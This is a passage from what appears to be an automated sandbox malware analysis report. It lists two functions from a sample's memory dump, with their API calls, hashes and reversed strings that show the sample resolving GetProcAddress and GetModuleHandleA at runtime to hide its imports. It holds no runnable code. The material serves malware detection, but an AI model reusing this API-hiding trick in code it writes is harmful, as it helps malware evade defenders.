                                          • Instruction Fuzzy Hash: B6014671780345AFFB00EEA4EC41F5ABBADEB48B00FA14460BD04D7740DAB4AD90AE24
                                          Function 02D58274 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID: AddressProc
                                          • String ID: Kernel32$sserddAcorPteG
                                          • API String ID: 190572456-1372893251
                                          • Opcode ID: 5acf51806ca2bcbfd1982a49b9b70eef5171a11ac6ccdcac9c4e1926f2e9ae08
                                          • Instruction ID: f8d85b8d1c39811093567513f8dc3cdf21ed1c09de72efc0a01ff187b98dd8a5
                                          • Opcode Fuzzy Hash: 5acf51806ca2bcbfd1982a49b9b70eef5171a11ac6ccdcac9c4e1926f2e9ae08
                                          • Instruction Fuzzy Hash: 00014F75640345AFFB00EBA4EC41F9ABBAEEB49B00F614460AC41D7700DA70AD44DE74
                                          Function 02D581CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: AeldnaHeludoMteG$KernelBASE
                                          • API String ID: 1646373207-1952140341
                                          • Opcode ID: abeccac40f397a50aed08dfd5322dc8a7fbc00663d76aefce00db10096a4cafd
                                          • Instruction ID: f15468ca5de3535afab8a70431ef2238fb3fa5d58a6adcbafe1f3573995f6ff1
                                          • Opcode Fuzzy Hash: abeccac40f397a50aed08dfd5322dc8a7fbc00663d76aefce00db10096a4cafd
                                          • Instruction Fuzzy Hash: 85F06270A44745AFEF00EBA4ED11959BBEDF74A700B618860EC10D7710DAB0AE509E74